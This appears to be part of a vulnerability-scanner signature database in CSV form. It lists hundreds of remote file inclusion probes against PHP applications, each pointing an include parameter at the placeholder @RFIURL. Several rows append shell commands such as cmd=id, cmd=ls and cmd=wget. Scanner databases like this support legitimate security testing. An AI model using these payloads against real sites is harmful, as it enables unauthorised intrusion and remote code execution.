"004507","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004508","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004509","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004510","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004511","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004512","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004513","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_smf/smf.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004514","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004515","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004516","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004517","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004518","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004519","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004520","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004521","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004522","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/core/connect.php?language_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004523","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/minibb/bb_plugins.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004524","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/minibb/index.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004525","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/minibb/index.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004526","https://gist.github.com/mubix/5d269c686584875015a2","c","/components/xmlparser/loadparser.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004527","https://gist.github.com/mubix/5d269c686584875015a2","c","/compteur/mapage.php?chemin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004528","https://gist.github.com/mubix/5d269c686584875015a2","c","/conf.php?securelib=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004529","https://gist.github.com/mubix/5d269c686584875015a2","c","/conf.php?securelib=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004530","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.inc.php3?rel_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004531","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.inc.php?_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004532","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.inc.php?path_escape=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004533","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.inc.php?path_escape=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004534","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?full_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004535","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?full_path_to_db=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004536","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?fullpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004537","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?incpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004538","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?path_to_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004539","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?rel_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004541","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?returnpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004542","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?sql_language=@RFIURL?&cmd=0wn3d","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004543","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004544","https://gist.github.com/mubix/5d269c686584875015a2","c","/config.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004545","https://gist.github.com/mubix/5d269c686584875015a2","c","/config/config_admin.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004546","https://gist.github.com/mubix/5d269c686584875015a2","c","/config/config_main.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004547","https://gist.github.com/mubix/5d269c686584875015a2","c","/config/config_member.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004548","https://gist.github.com/mubix/5d269c686584875015a2","c","/config/dbutil.bck.php?confdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004549","https://gist.github.com/mubix/5d269c686584875015a2","c","/config/mysql_config.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004550","https://gist.github.com/mubix/5d269c686584875015a2","c","/config/sender.php?ROOT_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004551","https://gist.github.com/mubix/5d269c686584875015a2","c","/configuration.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004552","https://gist.github.com/mubix/5d269c686584875015a2","c","/confirmUnsubscription.php?output=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004553","https://gist.github.com/mubix/5d269c686584875015a2","c","/connect.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004554","https://gist.github.com/mubix/5d269c686584875015a2","c","/connexion.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004555","https://gist.github.com/mubix/5d269c686584875015a2","c","/contact.php?blog_theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004556","https://gist.github.com/mubix/5d269c686584875015a2","c","/contacts.php?cal_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004557","https://gist.github.com/mubix/5d269c686584875015a2","c","/contenido/external/frontend/news.php?cfg[path][includes]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004558","https://gist.github.com/mubix/5d269c686584875015a2","c","/content.php?content=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004559","https://gist.github.com/mubix/5d269c686584875015a2","c","/content/admin.php?pwfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004560","https://gist.github.com/mubix/5d269c686584875015a2","c","/content/content.php?fileloc=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004561","https://gist.github.com/mubix/5d269c686584875015a2","c","/content/delete.php?pwfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004562","https://gist.github.com/mubix/5d269c686584875015a2","c","/content/modify.php?pwfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004563","https://gist.github.com/mubix/5d269c686584875015a2","c","/content/modify_go.php?pwfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004564","https://gist.github.com/mubix/5d269c686584875015a2","c","/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004565","https://gist.github.com/mubix/5d269c686584875015a2","c","/contrib/mx_glance_sdesc.php?mx_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004566","https://gist.github.com/mubix/5d269c686584875015a2","c","/contrib/phpBB2/modules.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004567","https://gist.github.com/mubix/5d269c686584875015a2","c","/controllers/MySQLController.php?baseDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004568","https://gist.github.com/mubix/5d269c686584875015a2","c","/controllers/SQLController.php?baseDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004569","https://gist.github.com/mubix/5d269c686584875015a2","c","/controllers/SetupController.php?baseDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004570","https://gist.github.com/mubix/5d269c686584875015a2","c","/controllers/VideoController.php?baseDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004571","https://gist.github.com/mubix/5d269c686584875015a2","c","/controllers/ViewController.php?baseDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004572","https://gist.github.com/mubix/5d269c686584875015a2","c","/convert-date.php?cal_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004573","https://gist.github.com/mubix/5d269c686584875015a2","c","/convert/mvcw.php?step=1&vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004574","https://gist.github.com/mubix/5d269c686584875015a2","c","/convert/mvcw.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004575","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/admin.php?p=admin&absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004576","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004577","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/categories_add.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004578","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/categories_remove.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004579","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004580","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/editdel.php?p=admin&absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004581","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/ftpfeature.php?p=admin&absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004582","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/login.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004583","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/pgRSSnews.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004584","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/showcat.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004585","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004586","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/archive_cat.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004587","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/archive_nocat.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004588","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/aural.php?site_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004589","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/aural.php?site_absolute_path=@RFIURL?&cmd=dir","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004590","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/editor.php?editor_insert_bottom=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004591","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/includes.php?CMS_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004592","https://gist.github.com/mubix/5d269c686584875015a2","c","/core/recent_list.php?absoluteurl@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004593","https://gist.github.com/mubix/5d269c686584875015a2","c","/corpo.php?pagina=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004594","https://gist.github.com/mubix/5d269c686584875015a2","c","/cp2.php?securelib=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004595","https://gist.github.com/mubix/5d269c686584875015a2","c","/cp2.php?securelib=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004596","https://gist.github.com/mubix/5d269c686584875015a2","c","/cpe/index.php?repertoire_config=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004597","https://gist.github.com/mubix/5d269c686584875015a2","c","/crea.php?plancia=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004598","https://gist.github.com/mubix/5d269c686584875015a2","c","/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004599","https://gist.github.com/mubix/5d269c686584875015a2","c","/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004600","https://gist.github.com/mubix/5d269c686584875015a2","c","/creat_news_all.php?language=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004601","https://gist.github.com/mubix/5d269c686584875015a2","c","/create_file.php?target=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004602","https://gist.github.com/mubix/5d269c686584875015a2","c","/cron.php?ROOT_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004603","https://gist.github.com/mubix/5d269c686584875015a2","c","/cron.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004604","https://gist.github.com/mubix/5d269c686584875015a2","c","/crontab/run_billing.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004605","https://gist.github.com/mubix/5d269c686584875015a2","c","/crontab/run_billing.php?config[include_dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004606","https://gist.github.com/mubix/5d269c686584875015a2","c","/cross.php?url=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004608","https://gist.github.com/mubix/5d269c686584875015a2","c","/custom_vars.php?sys[path_addon]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004609","https://gist.github.com/mubix/5d269c686584875015a2","c","/customer/product.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004610","https://gist.github.com/mubix/5d269c686584875015a2","c","/cwb/comanda.php?INCLUDE_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004611","https://gist.github.com/mubix/5d269c686584875015a2","c","/datei.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004612","https://gist.github.com/mubix/5d269c686584875015a2","c","/db/PollDB.php?CONFIG_DATAREADERWRITER=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004613","https://gist.github.com/mubix/5d269c686584875015a2","c","/db/mysql/db.inc.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004614","https://gist.github.com/mubix/5d269c686584875015a2","c","/dbcommon/include.php?_APP_RELATIVE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004615","https://gist.github.com/mubix/5d269c686584875015a2","c","/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004616","https://gist.github.com/mubix/5d269c686584875015a2","c","/debugger.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004617","https://gist.github.com/mubix/5d269c686584875015a2","c","/decoder/gallery.php?ccms_library_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004618","https://gist.github.com/mubix/5d269c686584875015a2","c","/decoder/markdown.php?ccms_library_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004619","https://gist.github.com/mubix/5d269c686584875015a2","c","/defaults_setup.php?ROOT_PATH=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004620","https://gist.github.com/mubix/5d269c686584875015a2","c","/defines.php?WEBCHATPATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004621","https://gist.github.com/mubix/5d269c686584875015a2","c","/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=@RFIURL&","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004622","https://gist.github.com/mubix/5d269c686584875015a2","c","/depouilg.php3?NomVote=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004623","https://gist.github.com/mubix/5d269c686584875015a2","c","/development.php?root_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004624","https://gist.github.com/mubix/5d269c686584875015a2","c","/development.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004625","https://gist.github.com/mubix/5d269c686584875015a2","c","/dfcode.php?DFORUM_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004626","https://gist.github.com/mubix/5d269c686584875015a2","c","/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004627","https://gist.github.com/mubix/5d269c686584875015a2","c","/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004628","https://gist.github.com/mubix/5d269c686584875015a2","c","/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004629","https://gist.github.com/mubix/5d269c686584875015a2","c","/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004630","https://gist.github.com/mubix/5d269c686584875015a2","c","/dialog.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004631","https://gist.github.com/mubix/5d269c686584875015a2","c","/dialogs/a.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004632","https://gist.github.com/mubix/5d269c686584875015a2","c","/dialogs/collorpicker.php?spaw_dir=@RFIURL&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004633","https://gist.github.com/mubix/5d269c686584875015a2","c","/dialogs/img.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004634","https://gist.github.com/mubix/5d269c686584875015a2","c","/dialogs/img_library.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004635","https://gist.github.com/mubix/5d269c686584875015a2","c","/dialogs/table.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004636","https://gist.github.com/mubix/5d269c686584875015a2","c","/dialogs/td.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004637","https://gist.github.com/mubix/5d269c686584875015a2","c","/digitaleye_Path/module.php?menu=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004638","https://gist.github.com/mubix/5d269c686584875015a2","c","/dir/prepend.php?_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004639","https://gist.github.com/mubix/5d269c686584875015a2","c","/dir_thatware/config.php?root_path=@RFIURL'","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004640","https://gist.github.com/mubix/5d269c686584875015a2","c","/direct.php?rf=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004641","https://gist.github.com/mubix/5d269c686584875015a2","c","/direction/index.php?repertoire_config=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004642","https://gist.github.com/mubix/5d269c686584875015a2","c","/directory/index.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004643","https://gist.github.com/mubix/5d269c686584875015a2","c","/display.php?pag=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004644","https://gist.github.com/mubix/5d269c686584875015a2","c","/display.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004645","https://gist.github.com/mubix/5d269c686584875015a2","c","/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004646","https://gist.github.com/mubix/5d269c686584875015a2","c","/dix.php3?url_phpartenaire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004647","https://gist.github.com/mubix/5d269c686584875015a2","c","/dm-albums/template/album.php?SECURITY_FILE=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004648","https://gist.github.com/mubix/5d269c686584875015a2","c","/doc/admin/index.php?ptinclude=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004649","https://gist.github.com/mubix/5d269c686584875015a2","c","/doceboCore/lib/lib.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004650","https://gist.github.com/mubix/5d269c686584875015a2","c","/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004651","https://gist.github.com/mubix/5d269c686584875015a2","c","/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004652","https://gist.github.com/mubix/5d269c686584875015a2","c","/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004653","https://gist.github.com/mubix/5d269c686584875015a2","c","/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004654","https://gist.github.com/mubix/5d269c686584875015a2","c","/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004655","https://gist.github.com/mubix/5d269c686584875015a2","c","/docs/front-end-demo/cart2.php?workdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004656","https://gist.github.com/mubix/5d269c686584875015a2","c","/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=@RFIURL?&cmd=wget%20XXpathXX","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004657","https://gist.github.com/mubix/5d269c686584875015a2","c","/dosearch.php?RESPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004658","https://gist.github.com/mubix/5d269c686584875015a2","c","/download.php?root_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004659","https://gist.github.com/mubix/5d269c686584875015a2","c","/download.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004660","https://gist.github.com/mubix/5d269c686584875015a2","c","/download_engine_V1.4.3/addmember.php?eng_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI 